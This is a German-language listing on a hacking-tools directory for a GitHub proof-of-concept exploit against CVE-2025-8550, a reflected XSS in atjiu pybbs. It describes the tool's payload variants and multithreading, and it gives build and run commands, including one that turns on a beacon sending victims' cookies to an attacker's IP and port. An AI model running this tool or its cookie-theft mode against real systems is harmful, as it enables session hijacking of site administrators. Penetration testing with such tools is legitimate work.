Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/bytereaper77/cve-2025-8550
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingArchived
GitHubbytereaper77/cve-2025-8550

CVE-2025-8550

Automatisierter Proof-of-Concept-Exploit für CVE-2025-8550, ein reflektierter XSS in atjiu pybbs. Bietet 20+ Payload-Varianten, Cookie-Exfiltration, Multithreading und anpassbare CLI für Penetrationstests.

Repository anzeigen
311vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-8550 – atjiu pybbs XSS Exploit

Beschreibung

Dieses Repository enthält einen automatisierten Proof-of-Concept (PoC)-Exploit für CVE-2025-8550, eine reflektierte Cross-Site-Scripting (XSS)-Sicherheitslücke in atjiu pybbs (≤ v6.0.0). Er zielt auf den Endpunkt /admin/topic/list des Parameters username ab, dem eine ordnungsgemäße Eingabebereinigung fehlt.

Funktionen

  • 20+ Payload-Variationen: script, SVG, iframe, object, onerror-Handler und mehr.

  • Automatische URL-Kodierung: gewährleistet sichere Injektion über libcurl's curl_easy_escape.

  • Cookie-Exfiltration (Optional): Beacon-Injektion zum Senden von document.cookie an einen angreiferkontrollierten Server.

  • Multithreading: verwendet pthreads, um Versuche zu parallelisieren und Tests zu beschleunigen.

  • Anpassbare CLI: unterstützt durch argparse, ermöglicht die Angabe von:

    • Ziel-URL (-u / --url)
    • Cookie-Datei für authentifizierte Anfragen (-c / --cookies)
    • Cookie-Payload aktivieren (-k / --cokpay)
    • Angreifer-Server-IP/Port (-i / --ip, -p / --port)
    • Ausführliche Protokollierung (-v / --verbose)

Build und Verwendung

root@kitploit:~
# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread 

# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]

#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
  • Ersetzen Sie http://<TARGET> durch Ihre Instanz von atjiu pybbs.
  • Verwenden Sie -k, um den Cookie-Diebstahl-Beacon zu aktivieren (erfordert -i und -p).
  • Lassen Sie -c weg, wenn keine Authentifizierungs-Cookies benötigt werden.

Referenzen :

  • NVD-Eintrag : https://nvd.nist.gov/vuln/detail/CVE-2025-8550

Lizenz :

MIT License

Tool herunterladen